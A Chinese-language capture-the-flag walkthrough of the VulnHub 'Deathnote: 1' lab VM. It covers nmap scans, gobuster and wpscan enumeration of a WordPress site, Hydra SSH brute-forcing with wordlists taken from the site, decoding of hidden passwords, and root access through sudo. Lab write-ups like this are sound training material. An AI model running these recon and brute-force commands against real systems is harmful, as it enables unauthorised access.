Deathnote: 1
來自 <Deathnote: 1 ~ VulnHub>
1,將兩臺虛擬機網絡連接都改為NAT模式
2,攻擊機上做namp局域網掃描發現靶機
nmap -sn 192.168.23.0/24
那么攻擊機IP為192.168.23.128,靶場IP192.168.23.129
3,對靶機進行端口服務探測
nmap -sV -T4 -p- -A 192.168.23.129
4,訪問80端口開放的http服務
那么就需要我修改域名解析文件
echo "192.168.23.129 deathnote.vuln" >>/etc/hosts
域名解析成功 http://deathnote.vuln/wordpress/
再掃描枚舉網站子目錄
gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403
再掃描識別其指紋特征
典型的wordpress CMS建站
5,然后拿wpscan進行專項掃描
wpscan --url http://deathnote.vuln/wordpress/ -e u
得到一個用戶名。還是回到網站子目錄枚舉
http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/
下載這兩個文本作為密碼本
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt
wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
hydra -L user.txt -P notes.txt ssh://192.168.23.129
?l/death4me
6,然后再嘗試ssh登錄
ssh l@192.168.23.129
得到flag
對加密內容進行解密 Brainfuck/OoK加密解密 - Bugku CTF平臺
然后信息收集一下
在/opt/下發現一個L?的目錄,對其中一串十六進制字符轉碼
得到一個密碼:kiraisevil,wpscan掃描的時候掃出來一個kira用戶
7,嘗試切換到kira用戶
得到第二個flag
sudo -l看一下提權操作
這種提權操作最簡單
sudo su
提權成功,得到flag